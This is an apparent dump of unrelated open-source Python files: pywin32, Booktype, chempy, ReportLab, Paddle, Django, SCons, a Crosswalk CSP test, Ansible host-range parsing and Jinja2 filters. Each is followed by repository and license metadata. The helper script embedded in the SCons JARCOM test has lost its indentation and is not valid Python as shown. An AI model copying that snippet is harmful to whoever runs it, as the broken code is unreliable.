            print "Command terminated with an unhandled exception"
        writer.unregister()
        if bOK and bCloseOnEnd:
            myout.frame.DestroyWindow()
    # Unhandled exception of any kind in a thread kills the gui!
    except:
        t, v, tb = sys.exc_info()
        print t, ': ', v
        traceback.print_tb(tb)
        tb = None
        print "Thread failed"
# assist for reloading (when debugging) - use only 1 tracer object,
# else a large chain of tracer objects will exist.
# Fix: this singleton creation was commented out, leaving the module
# without the global 'writer' that ServerThread() calls register() on,
# so StartServer always failed with a NameError.
try:
    writer
except NameError:
    writer = ThreadWriter()

if __name__=='__main__':
    import demoutils
    demoutils.NotAScript()
| bsd-3-clause |
latinproject/booktype-latin | lib/booki/editor/management/commands/confset.py | 2 | 4113 | # This file is part of Booktype.
# Copyright (c) 2012 Aleksandar Erkalovic <aleksandar.erkalovic@sourcefabric.org>
#
# Booktype is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Booktype is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Booktype. If not, see <http://www.gnu.org/licenses/>.
from django.core.management.base import BaseCommand, CommandError
from optparse import make_option
from django.conf import settings
from booki.utils import config
from booki.utils.json_wrapper import json
class Command(BaseCommand):
    """Store a value under a configuration key in BOOKTYPE_CONFIG.

    Usage: confset <name> <value>

    The value may be coerced (--integer, --float), parsed as JSON
    (--as_json), or used to modify an existing list (--append / --remove).
    """
    args = "<name> <value>"
    help = "Set value for configuration variable."

    option_list = BaseCommand.option_list + (
        make_option('--as_json',
                    action='store_true',
                    dest='as_json',
                    default=False,
                    help='Value is defined as JSON encoded string.'),
        make_option('--integer',
                    action='store_true',
                    dest='integer',
                    default=False,
                    help='Value is a integer.'),
        make_option('--float',
                    action='store_true',
                    dest='float',
                    default=False,
                    help='Value is a float.'),
        make_option('--append',
                    action='store_true',
                    dest='append',
                    default=False,
                    help='Append value to the end of list.'),
        make_option('--remove',
                    action='store_true',
                    dest='remove',
                    default=False,
                    help='Remove value from the list.'),
    )

    requires_model_validation = False

    def handle(self, *args, **options):
        """Validate arguments, coerce the value, update and save the config.

        Raises CommandError for any invalid input or persistence failure.
        """
        if not hasattr(settings, 'BOOKTYPE_CONFIG'):
            raise CommandError('Does not have BOOKTYPE_CONFIG in settings.py file.')

        if len(args) != 2:
            raise CommandError("You must specify variable name and value.")

        key, value = args

        if options['integer']:
            try:
                value = int(value)
            except ValueError:
                raise CommandError("I don't think this %s is a number!" % value)

        if options['float']:
            try:
                value = float(value)
            except ValueError:
                raise CommandError("I don't think this %s is a number!" % value)

        if options['as_json']:
            try:
                value = json.loads(value)
            except ValueError:
                raise CommandError("Not a valid JSON string.")

        if options['append']:
            # NOTE: --append does not work well together with --as_json
            # (translated from the original Croatian comment).
            lst = config.getConfiguration(key, [])
            if isinstance(lst, list):
                lst.append(value)
                config.setConfiguration(key, lst)
            else:
                raise CommandError("Can not append to something that is not a list")
        elif options['remove']:
            lst = config.getConfiguration(key, [])
            if isinstance(lst, list):
                try:
                    lst.remove(value)
                except ValueError:
                    raise CommandError("I can't see it!")
                config.setConfiguration(key, lst)
            else:
                # Fix: this branch previously reused the --append error text.
                raise CommandError("Can not remove from something that is not a list")
        else:
            config.setConfiguration(key, value)

        try:
            config.saveConfiguration()
        except config.ConfigurationError:
            raise CommandError("Could not save the file.")
| agpl-3.0 |
bjodah/aqchem | chempy/thermodynamics/tests/test_expressions.py | 1 | 3227 | # -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function)
import math
from chempy.chemistry import Equilibrium
from chempy.util._expr import Expr
from chempy.util.testing import requires
from chempy.units import allclose, units_library, Backend, default_units as du, default_constants as dc
from ..expressions import MassActionEq, GibbsEqConst
@requires('sympy')
def test_MassActionEq_symbolic():
    # For the equilibrium A <-> B + C, MassActionEq's equation should be
    # K - B*C/A, so subtracting K and adding B*C/A must give exactly zero.
    import sympy as sp
    K, A, B, C = sp.symbols('K A B C')
    mae = MassActionEq([K])
    eq = Equilibrium({'A'}, {'B', 'C'})
    expr = mae.equilibrium_equation({'A': A, 'B': B, 'C': C}, equilibrium=eq)
    assert expr - K + B*C/A == 0
def test_GibbsEqConst():
    """GibbsEqConst at 298.15 K matches exp(-(dH - T*dS)/(R*T))."""
    gas_const = 8.314
    temp = 298.15
    enthalpy, entropy = -4e3, 16
    expr = GibbsEqConst([enthalpy/gas_const, entropy/gas_const])
    expected = math.exp(-(enthalpy - temp*entropy)/(gas_const*temp))
    assert abs((expr({'temperature': temp}) - expected)/expected) < 1e-14
def _gibbs(args, T, R, backend):
    """Equilibrium constant from (H, S, Cp, Tref) at temperature T.

    Enthalpy and entropy are first corrected from Tref to T with the
    constant heat capacity Cp, then K = exp(-(H2 - T*S2)/(R*T)).
    """
    enthalpy, entropy, heat_cap, ref_temp = args
    corrected_H = enthalpy + heat_cap * (T - ref_temp)
    corrected_S = entropy + heat_cap * backend.log(T / ref_temp)
    return backend.exp(-(corrected_H - T * corrected_S) / (R * T))
def test_custom_gibbs():
    # Wrap _gibbs (heat-capacity corrected Gibbs expression) into a
    # MassActionEq and compare against a hand-computed reference value.
    R, T = 8.314, 298.15
    dH, dS = -4e3, 16
    MyGibbs = MassActionEq.from_callback(_gibbs, parameter_keys=('temperature', 'R'),
                                         argument_names=('H', 'S', 'Cp', 'Tref'))
    dCp = 123.45
    Tref = 242
    gee2 = MyGibbs([dH, dS, dCp, Tref])
    # Reference: same Cp correction applied manually.
    dH2 = dH + dCp*(T - Tref)
    dS2 = dS + dCp*math.log(T/Tref)
    ref2 = math.exp(-(dH2 - T*dS2)/(R*T))
    assert abs((gee2.eq_const({'temperature': T, 'R': R}) - ref2)/ref2) < 1e-14
def test_GibbsEqConst__unique_keys():
    # Same numeric check as test_GibbsEqConst, but the parameters are
    # supplied through the variables dict via unique_keys instead of
    # positionally at construction time.
    R, T = 8.314, 298.15
    dH, dS = -4e3, 16
    gee = GibbsEqConst(unique_keys=('dH1', 'dS1'))
    ref = math.exp(-(dH - T*dS)/(R*T))
    assert abs((gee.eq_const({'temperature': T, 'dH1': dH/R, 'dS1': dS/R}) - ref)/ref) < 1e-14
@requires('sympy')
def test_GibbsEqConst__latex():
    # Symbolic backend: the produced sympy expression must simplify to the
    # analytic form exp(-(dH - T*dS)/(R*T)).
    import sympy
    DH, DS, R, T = sympy.symbols(r'\Delta\ H \Delta\ S R T')
    gee = GibbsEqConst([DH/R, DS/R])
    res = gee.eq_const({'temperature': T}, backend=sympy)
    ref = sympy.exp(-(DH - T*DS)/(R*T))
    assert (res - ref).simplify() == 0
@requires(units_library)
def test_GibbsEqConst__units():
    # Same check as test_GibbsEqConst but with unit-carrying quantities and
    # the units-aware Backend.
    R, T = dc.molar_gas_constant, 298.15*du.K
    DH = -4e3 * du.J/du.mol
    DS = 16 * du.J/du.K/du.mol
    be = Backend()
    gee = GibbsEqConst([DH/R, DS/R])
    res = gee.eq_const({'temperature': T}, backend=be)
    ref = be.exp(-(DH - T*DS)/(R*T))
    assert allclose(res, ref)
@requires(units_library)
def test_GibbsEqConst__nested():
    # 'temperature' is itself an Expr (energy / heat_capacity), exercising
    # nested parameter evaluation: 2981.5 J / (10 J/K) = 298.15 K.
    class TExpr(Expr):
        argument_names = ('heat_capacity',)
        parameter_keys = ('energy',)
        def __call__(self, variables, backend=None):
            heat_capacity, = self.all_args(variables, backend=backend)
            energy, = self.all_params(variables, backend=backend)
            return energy/heat_capacity
    R = 8.314 * du.J/du.K/du.mol
    T = TExpr([10.0 * du.J/du.K])
    dH, dS = -4e3 * du.J/du.mol, 16 * du.J/du.K/du.mol
    gee = GibbsEqConst([dH/R, dS/R])
    be = Backend()
    Tref = 298.15 * du.K
    ref = be.exp(-(dH - Tref*dS)/(R*Tref))
    assert be.abs((gee.eq_const({'energy': 2981.5 * du.J, 'temperature': T}, backend=be) - ref)/ref) < 1e-14
| bsd-2-clause |
nakagami/reportlab | src/reportlab/lib/rltempfile.py | 1 | 1174 | #Copyright ReportLab Europe Ltd. 2000-2012
#see license.txt for license details
# $URI:$
__version__=''' $Id: rltempfile.py 3959 2012-09-27 14:39:39Z robin $ '''
__doc__='''Helper for the test suite - determines where to write output.
When our test suite runs as source, a script "test_foo.py" will typically
create "test_foo.pdf" alongside it. But if you are testing a package of
compiled code inside a zip archive, this won't work. This determines
where to write test suite output, creating a subdirectory of /tmp/ or
whatever if needed.
'''
# Cached per-user temp directory path; created lazily by get_rl_tempdir().
_rl_tempdir=None
# Fix: the tuple previously listed 'get_rl_tempdir' twice, unintentionally
# leaving get_rl_tempfile out of the module's public API.
__all__ = ('get_rl_tempdir', 'get_rl_tempfile')
import os, tempfile
def _rl_getuid():
    """Return os.getuid() where available (POSIX), else '' (e.g. Windows)."""
    getuid = getattr(os, 'getuid', None)
    return getuid() if getuid is not None else ''
def get_rl_tempdir(*subdirs):
    """Return (creating it if needed) ReportLab's per-user temp directory.

    The base directory is <system tempdir>/ReportLab_tmp<uid>, cached in
    the module global _rl_tempdir; any *subdirs* are joined underneath it.
    """
    global _rl_tempdir
    if _rl_tempdir is None:
        _rl_tempdir = os.path.join(tempfile.gettempdir(),'ReportLab_tmp%s' % str(_rl_getuid()))
    d = _rl_tempdir
    if subdirs: d = os.path.join(*((d,)+subdirs))
    try:
        os.makedirs(d)
    except OSError:
        # Fix: was a bare 'except:', which also swallowed KeyboardInterrupt
        # and SystemExit.  Directory creation stays best-effort: the most
        # common failure is that the directory already exists.
        pass
    return d
def get_rl_tempfile(fn=None):
    """Return a path for *fn* inside the temp dir (random name when fn is falsy)."""
    name = fn or tempfile.mktemp()
    return os.path.join(get_rl_tempdir(), name)
| bsd-3-clause |
pkuyym/Paddle | python/paddle/fluid/tests/unittests/test_const_value.py | 4 | 1041 | # Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import paddle.fluid.framework as framework
class ConditionalBlock(unittest.TestCase):
    """Verify the framework's reserved variable-name constants."""

    def test_const_value(self):
        # Fix: GRAD_VAR_SUFFIX was previously asserted twice; each constant
        # is now checked exactly once.
        self.assertEqual(framework.GRAD_VAR_SUFFIX, "@GRAD")
        self.assertEqual(framework.TEMP_VAR_NAME, "@TEMP@")
        self.assertEqual(framework.ZERO_VAR_SUFFIX, "@ZERO")


if __name__ == '__main__':
    unittest.main()
| apache-2.0 |
cubicova17/annet | venv/lib/python2.7/site-packages/django/template/loaders/cached.py | 114 | 2619 | """
Wrapper class that takes a list of template loaders as an argument and attempts
to load templates from them in order, caching the result.
"""
import hashlib
from django.template.base import TemplateDoesNotExist
from django.template.loader import BaseLoader, get_template_from_string, find_template_loader, make_origin
from django.utils.encoding import force_bytes
class Loader(BaseLoader):
    """Template loader that tries each wrapped loader in order and caches
    compiled templates keyed by template name (plus a dirs hash)."""
    is_usable = True
    def __init__(self, loaders):
        # Compiled-template cache: key -> Template (or source string).
        self.template_cache = {}
        self._loaders = loaders
        self._cached_loaders = []
    @property
    def loaders(self):
        # Resolve loaders on demand to avoid circular imports
        if not self._cached_loaders:
            # Set self._cached_loaders atomically. Otherwise, another thread
            # could see an incomplete list. See #17303.
            cached_loaders = []
            for loader in self._loaders:
                cached_loaders.append(find_template_loader(loader))
            self._cached_loaders = cached_loaders
        return self._cached_loaders
    def find_template(self, name, dirs=None):
        # Return (template, origin) from the first wrapped loader that
        # succeeds; raise TemplateDoesNotExist if none can find it.
        for loader in self.loaders:
            try:
                template, display_name = loader(name, dirs)
                return (template, make_origin(display_name, loader, name, dirs))
            except TemplateDoesNotExist:
                pass
        raise TemplateDoesNotExist(name)
    def load_template(self, template_name, template_dirs=None):
        # Cached lookup; a second return value of None means "origin unknown"
        # for cache hits and successfully compiled templates.
        key = template_name
        if template_dirs:
            # If template directories were specified, use a hash to differentiate
            key = '-'.join([template_name, hashlib.sha1(force_bytes('|'.join(template_dirs))).hexdigest()])
        try:
            template = self.template_cache[key]
        except KeyError:
            template, origin = self.find_template(template_name, template_dirs)
            if not hasattr(template, 'render'):
                try:
                    template = get_template_from_string(template, origin, template_name)
                except TemplateDoesNotExist:
                    # If compiling the template we found raises TemplateDoesNotExist,
                    # back off to returning the source and display name for the template
                    # we were asked to load. This allows for correct identification (later)
                    # of the actual template that does not exist.
                    return template, origin
            self.template_cache[key] = template
        return template, None
    def reset(self):
        "Empty the template cache."
        self.template_cache.clear()
| mit |
datalogics-robb/scons | test/Java/JARCOM.py | 2 | 2024 | #!/usr/bin/env python
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
"""
Test the ability to configure the $JARCOM construction variable.
"""
import TestSCons
_python_ = TestSCons._python_
test = TestSCons.TestSCons()
test.write('myjar.py', r"""
import sys
outfile = open(sys.argv[1], 'wb')
for f in sys.argv[2:]:
infile = open(f, 'rb')
for l in filter(lambda l: l != '/*jar*/\n', infile.readlines()):
outfile.write(l)
sys.exit(0)
""")
test.write('SConstruct', """
env = Environment(TOOLS = ['default', 'jar'],
JARCOM = r'%(_python_)s myjar.py $TARGET $SOURCES')
env.Jar(target = 'test1', source = ['file1.in', 'file2.in', 'file3.in'])
""" % locals())
test.write('file1.in', "file1.in\n/*jar*/\n")
test.write('file2.in', "file2.in\n/*jar*/\n")
test.write('file3.in', "file3.in\n/*jar*/\n")
test.run()
test.must_match('test1.jar', "file1.in\nfile2.in\nfile3.in\n")
test.pass_test()
| mit |
kaixinjxq/crosswalk-test-suite | webapi/tct-csp-w3c-tests/csp-py/csp_default-src_cross-origin_multi_font_allowed_two-manual.py | 25 | 2623 | def main(request, response):
_URL = request.url
_CSP = "default-src http://www.tizen.com " + \
_URL[:_URL.index('/csp') + 1] + "; style-src 'unsafe-inline'"
_CSSURL = _URL[:_URL.index('/csp') + 1] + "csp/support/w3c/CanvasTest.ttf"
print _CSSURL
response.headers.set("Content-Security-Policy", _CSP)
response.headers.set("X-Content-Security-Policy", _CSP)
response.headers.set("X-WebKit-CSP", _CSP)
return """<!DOCTYPE html>
<!--
Copyright (c) 2013 Intel Corporation.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of works must retain the original copyright notice, this list
of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the original copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
may be used to endorse or promote products derived from this work without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY INTEL CORPORATION "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL INTEL CORPORATION BE LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Authors:
Hao, Yunfei <yunfeix.hao@intel.com>
-->
<html>
<head>
<title>CSP Test: csp_default-src_cross-origin_multi_font_allowed_two</title>
<link rel="author" title="Intel" href="http://www.intel.com"/>
<link rel="help" href="http://www.w3.org/TR/2012/CR-CSP-20121115/#default-src"/>
<meta name="flags" content=""/>
<meta charset="utf-8"/>
<style>
@font-face {
font-family: Canvas;
src: url(""" + _CSSURL + """);
}
#test {
font-family: Canvas;
}
</style>
</head>
<body>
<p>Test passes if the two lines are different in font</p>
<div id="test">1234 ABCD</div>
<div>1234 ABCD</div>
</body>
</html> """
| bsd-3-clause |
gtaylor/ansible | v2/ansible/inventory/expand_hosts.py | 71 | 4415 | # (c) 2012, Zettar Inc.
# Written by Chin Fang <fangchin@zettar.com>
#
# This file is part of Ansible
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
#
'''
This module is for enhancing ansible's inventory parsing capability such
that it can deal with hostnames specified using a simple pattern in the
form of [beg:end], example: [1:5], [a:c], [D:G]. If beg is not specified,
it defaults to 0.
If beg is given and is left-zero-padded, e.g. '001', it is taken as a
formatting hint when the range is expanded. e.g. [001:010] is to be
expanded into 001, 002 ...009, 010.
Note that when beg is specified with left zero padding, then the length of
end must be the same as that of beg, else an exception is raised.
'''
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import string
from ansible import errors
def detect_range(line = None):
    '''
    A helper function that checks a given host line to see if it contains
    a range pattern described in the docstring above.

    Returns True if the given line contains a pattern, else False.
    '''
    # '[', ':' and ']' must all be present and appear in that order; the
    # chained comparison of the find() indices expresses exactly that and
    # already yields the boolean (no if/else needed).
    return 0 <= line.find("[") < line.find(":") < line.find("]")
def expand_hostname_range(line = None):
    '''
    A helper function that expands a given line that contains a pattern
    specified in top docstring, and returns a list that consists of the
    expanded version.
    The '[' and ']' characters are used to maintain the pseudo-code
    appearance. They are replaced in this function with '|' to ease
    string splitting.
    References: http://ansible.github.com/patterns.html#hosts-and-groups
    '''
    all_hosts = []
    if line:
        # A hostname such as db[1:6]-node is considered to consists
        # three parts:
        # head: 'db'
        # nrange: [1:6]; range() is a built-in. Can't use the name
        # tail: '-node'
        # Add support for multiple ranges in a host so:
        # db[01:10:3]node-[01:10]
        # - to do this we split off at the first [...] set, getting the list
        # of hosts and then repeat until none left.
        # - also add an optional third parameter which contains the step. (Default: 1)
        # so range can be [01:10:2] -> 01 03 05 07 09
        # FIXME: make this work for alphabetic sequences too.
        # Only the FIRST bracket pair is split out here; any further ranges
        # in 'tail' are handled by the recursive call at the bottom.
        (head, nrange, tail) = line.replace('[','|',1).replace(']','|',1).split('|')
        bounds = nrange.split(":")
        if len(bounds) != 2 and len(bounds) != 3:
            raise errors.AnsibleError("host range incorrectly specified")
        beg = bounds[0]
        end = bounds[1]
        if len(bounds) == 2:
            step = 1
        else:
            step = bounds[2]
        if not beg:
            # An omitted start ([:5]) defaults to 0.
            beg = "0"
        if not end:
            raise errors.AnsibleError("host range end value missing")
        if beg[0] == '0' and len(beg) > 1:
            # Left-zero-padded start (e.g. '001') is a formatting hint:
            # every generated number is zero-filled to the same width.
            rlen = len(beg) # range length formatting hint
            if rlen != len(end):
                raise errors.AnsibleError("host range format incorrectly specified!")
            fill = lambda _: str(_).zfill(rlen) # range sequence
        else:
            fill = str
        try:
            # Alphabetic range ([a:c] / [D:G]) via ascii_letters positions;
            # non-letter bounds raise ValueError and fall through to numbers.
            i_beg = string.ascii_letters.index(beg)
            i_end = string.ascii_letters.index(end)
            if i_beg > i_end:
                raise errors.AnsibleError("host range format incorrectly specified!")
            seq = string.ascii_letters[i_beg:i_end+1]
        except ValueError: # not an alpha range
            seq = range(int(beg), int(end)+1, int(step))
        for rseq in seq:
            hname = ''.join((head, fill(rseq), tail))
            if detect_range(hname):
                # Tail still contains a [x:y] pattern - expand recursively.
                all_hosts.extend( expand_hostname_range( hname ) )
            else:
                all_hosts.append(hname)
    return all_hosts
| gpl-3.0 |
michaelgugino/turbo-lister | jinja2/filters.py | 5 | 30154 | # -*- coding: utf-8 -*-
"""
jinja2.filters
~~~~~~~~~~~~~~
Bundled jinja filters.
:copyright: (c) 2010 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
import re
import math
from random import choice
from operator import itemgetter
from itertools import groupby
from jinja2.utils import Markup, escape, pformat, urlize, soft_unicode, \
unicode_urlencode
from jinja2.runtime import Undefined
from jinja2.exceptions import FilterArgumentError
from jinja2._compat import imap, string_types, text_type, iteritems
_word_re = re.compile(r'\w+(?u)')
def contextfilter(f):
    """Decorator for marking context dependent filters. The current
    :class:`Context` will be passed as first argument.
    """
    setattr(f, 'contextfilter', True)
    return f
def evalcontextfilter(f):
    """Decorator for marking eval-context dependent filters. An eval
    context object is passed as first argument. For more information
    about the eval context, see :ref:`eval-context`.

    .. versionadded:: 2.4
    """
    setattr(f, 'evalcontextfilter', True)
    return f
def environmentfilter(f):
    """Decorator for marking environment dependent filters. The current
    :class:`Environment` is passed to the filter as first argument.
    """
    setattr(f, 'environmentfilter', True)
    return f
def make_attrgetter(environment, attribute):
    """Return a callable that looks up *attribute* on a passed object with
    the environment's getitem rules.  A dotted string descends through
    sub-attributes and purely numeric path parts are looked up as integers.
    """
    simple = (not isinstance(attribute, string_types)
              or ('.' not in attribute and not attribute.isdigit()))
    if simple:
        return lambda x: environment.getitem(x, attribute)
    path = attribute.split('.')

    def attrgetter(item):
        obj = item
        for part in path:
            key = int(part) if part.isdigit() else part
            obj = environment.getitem(obj, key)
        return obj
    return attrgetter
def do_forceescape(value):
    """Enforce HTML escaping.  Already-safe markup (objects exposing
    ``__html__``) is unwrapped first and escaped a second time."""
    unwrapped = value.__html__() if hasattr(value, '__html__') else value
    return escape(text_type(unwrapped))
def do_urlencode(value):
    """Escape strings for use in URLs (uses UTF-8 encoding).  It accepts both
    dictionaries and regular strings as well as pairwise iterables.

    .. versionadded:: 2.7
    """
    itemiter = None
    if isinstance(value, dict):
        itemiter = iteritems(value)
    elif not isinstance(value, string_types):
        # Non-string, non-dict values may still be an iterable of
        # (key, value) pairs.
        try:
            itemiter = iter(value)
        except TypeError:
            pass
    if itemiter is None:
        # Plain string (or non-iterable): quote it as a single value.
        return unicode_urlencode(value)
    return u'&'.join(unicode_urlencode(k) + '=' +
                     unicode_urlencode(v) for k, v in itemiter)
@evalcontextfilter
def do_replace(eval_ctx, s, old, new, count=None):
    """Return a copy of the value with all occurrences of a substring
    replaced with a new one. The first argument is the substring
    that should be replaced, the second is the replacement string.
    If the optional third argument ``count`` is given, only the first
    ``count`` occurrences are replaced:

    .. sourcecode:: jinja

        {{ "Hello World"|replace("Hello", "Goodbye") }}
            -> Goodbye World

        {{ "aaaaargh"|replace("a", "d'oh, ", 2) }}
            -> d'oh, d'oh, aaargh
    """
    if count is None:
        count = -1
    if not eval_ctx.autoescape:
        return text_type(s).replace(text_type(old), text_type(new), count)
    # When autoescaping: if either the pattern or the replacement carries
    # markup while the subject does not, the subject must be escaped first
    # so the result is safe.  The original expression lacked parentheses
    # (`A or B and C` parses as `A or (B and C)`), so a markup `old` with a
    # plain `s` skipped the "s is not markup" check.
    if (hasattr(old, '__html__') or hasattr(new, '__html__')) and \
            not hasattr(s, '__html__'):
        s = escape(s)
    else:
        s = soft_unicode(s)
    return s.replace(soft_unicode(old), soft_unicode(new), count)
def do_upper(s):
    """Convert a value to uppercase."""
    # soft_unicode converts to text without force-escaping Markup objects.
    return soft_unicode(s).upper()
def do_lower(s):
    """Convert a value to lowercase."""
    # soft_unicode converts to text without force-escaping Markup objects.
    return soft_unicode(s).lower()
@evalcontextfilter
def do_xmlattr(_eval_ctx, d, autospace=True):
    """Create an SGML/XML attribute string based on the items in a dict.
    All values that are neither `none` nor `undefined` are automatically
    escaped:

    .. sourcecode:: html+jinja

        <ul{{ {'class': 'my_list', 'missing': none,
               'id': 'list-%d'|format(variable)}|xmlattr }}>
        ...
        </ul>

    Results in something like this:

    .. sourcecode:: html

        <ul class="my_list" id="list-42">
        ...
        </ul>

    As you can see it automatically prepends a space in front of the item
    if the filter returned something unless the second parameter is false.
    """
    # None and Undefined entries are silently dropped so templates can
    # conditionally omit attributes.
    rv = u' '.join(
        u'%s="%s"' % (escape(key), escape(value))
        for key, value in iteritems(d)
        if value is not None and not isinstance(value, Undefined)
    )
    if autospace and rv:
        rv = u' ' + rv
    if _eval_ctx.autoescape:
        rv = Markup(rv)
    return rv
def do_capitalize(s):
    """Capitalize a value. The first character will be uppercase, all others
    lowercase.
    """
    return soft_unicode(s).capitalize()
def do_title(s):
    """Return a titlecased version of the value. I.e. words will start with
    uppercase letters, all remaining characters are lowercase.
    """
    rv = []
    # Split on runs of whitespace/hyphens while keeping the separators
    # (capturing group), so the original spacing is preserved.
    for item in re.compile(r'([-\s]+)(?u)').split(soft_unicode(s)):
        if not item:
            continue
        rv.append(item[0].upper() + item[1:].lower())
    return ''.join(rv)
def do_dictsort(value, case_sensitive=False, by='key'):
    """Sort a dict and yield (key, value) pairs. Because python dicts are
    unsorted you may want to use this function to order them by either
    key or value:

    .. sourcecode:: jinja

        {% for item in mydict|dictsort %}
            sort the dict by key, case insensitive

        {% for item in mydict|dictsort(true) %}
            sort the dict by key, case sensitive

        {% for item in mydict|dictsort(false, 'value') %}
            sort the dict by key, case insensitive, sorted
            normally and ordered by value.
    """
    if by == 'key':
        pos = 0
    elif by == 'value':
        pos = 1
    else:
        raise FilterArgumentError('You can only sort by either '
                                  '"key" or "value"')
    def sort_func(item):
        # item is a (key, value) tuple; pos selects the sort field.
        value = item[pos]
        if isinstance(value, string_types) and not case_sensitive:
            value = value.lower()
        return value
    return sorted(value.items(), key=sort_func)
@environmentfilter
def do_sort(environment, value, reverse=False, case_sensitive=False,
            attribute=None):
    """Sort an iterable.  Per default it sorts ascending, if you pass it
    true as first argument it will reverse the sorting.

    If the iterable is made of strings the third parameter can be used to
    control the case sensitiveness of the comparison which is disabled by
    default.

    .. sourcecode:: jinja

        {% for item in iterable|sort %}
            ...
        {% endfor %}

    It is also possible to sort by an attribute (for example to sort
    by the date of an object) by specifying the `attribute` parameter:

    .. sourcecode:: jinja

        {% for item in iterable|sort(attribute='date') %}
            ...
        {% endfor %}

    .. versionchanged:: 2.6
       The `attribute` parameter was added.
    """
    if not case_sensitive:
        def sort_func(item):
            if isinstance(item, string_types):
                item = item.lower()
            return item
    else:
        sort_func = None
    if attribute is not None:
        getter = make_attrgetter(environment, attribute)
        # Bind the previous sort_func as a default argument so the new
        # closure composes attribute lookup with case folding.
        def sort_func(item, processor=sort_func or (lambda x: x)):
            return processor(getter(item))
    return sorted(value, key=sort_func, reverse=reverse)
def do_default(value, default_value=u'', boolean=False):
    """If the value is undefined it will return the passed default value,
    otherwise the value of the variable:

    .. sourcecode:: jinja

        {{ my_variable|default('my_variable is not defined') }}

    This will output the value of ``my_variable`` if the variable was
    defined, otherwise ``'my_variable is not defined'``. If you want
    to use default with variables that evaluate to false you have to
    set the second parameter to `true`:

    .. sourcecode:: jinja

        {{ ''|default('the string was empty', true) }}
    """
    # `boolean=True` extends the check from "undefined" to any falsy value.
    if isinstance(value, Undefined) or (boolean and not value):
        return default_value
    return value
@evalcontextfilter
def do_join(eval_ctx, value, d=u'', attribute=None):
    """Return a string which is the concatenation of the strings in the
    sequence. The separator between elements is an empty string per
    default, you can define it with the optional parameter:

    .. sourcecode:: jinja

        {{ [1, 2, 3]|join('|') }}
            -> 1|2|3

        {{ [1, 2, 3]|join }}
            -> 123

    It is also possible to join certain attributes of an object:

    .. sourcecode:: jinja

        {{ users|join(', ', attribute='username') }}

    .. versionadded:: 2.6
       The `attribute` parameter was added.
    """
    if attribute is not None:
        value = imap(make_attrgetter(eval_ctx.environment, attribute), value)
    # no automatic escaping?  joining is a lot easier then
    if not eval_ctx.autoescape:
        return text_type(d).join(imap(text_type, value))
    # if the delimiter doesn't have an html representation we check
    # if any of the items has.  If yes we do a coercion to Markup
    if not hasattr(d, '__html__'):
        value = list(value)
        do_escape = False
        for idx, item in enumerate(value):
            if hasattr(item, '__html__'):
                do_escape = True
            else:
                value[idx] = text_type(item)
        if do_escape:
            d = escape(d)
        else:
            d = text_type(d)
        return d.join(value)
    # delimiter already carries markup, do normal joining
    return soft_unicode(d).join(imap(soft_unicode, value))
def do_center(value, width=80):
    """Centers the value in a field of a given width."""
    return text_type(value).center(width)
